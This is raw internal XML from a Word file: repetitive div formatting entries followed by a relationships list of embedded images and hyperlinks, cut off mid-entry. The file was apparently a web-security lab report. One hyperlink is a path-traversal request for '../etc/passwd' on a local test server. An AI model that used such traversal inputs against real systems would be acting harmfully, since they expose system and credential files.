              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="887840017">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1813521806">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="950167768">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1618216414">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="737170497">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1571191031">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="948051074">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1204099604">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1966736214">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="297414324">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1331249816">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1646810407">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1752390942">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="174414033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639646372">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="453908088">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="393352816">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1611157320">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="726951206">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1992251453">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1363096287">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="483014486">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1869904227">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1899198523">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="577861817">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="90980296">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1820731643">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="853689353">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="892275901">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1055197660">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="884754026">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1546334859">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="544877532">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="436563557">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="969554871">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2020810659">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1313026493">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1036006186">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1465465071">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1398817829">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1813478130">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1159421585">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="18316536">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1754622991">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="816339487">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="215515023">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="986780541">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="622349165">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="643315949">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="91636423">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1989705325">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1499617711">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="989136990">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="3345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52.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image271.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/583680485808208639031964731065993512240/deletesnippet?index=0" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image224.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:nwadmin@appliedsystems.com" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image280.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image199.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image234.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image245.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image256.png"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.a.com" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.99:8080/../etc/passwd" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github-com.translate.goog/Vereyon/HtmlRuleSanitizer?_x_tr_sl=auto&amp;_x_tr_tl=es&amp;_x_tr_hl=es&amp;_x_tr_pto=wapp" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId161" 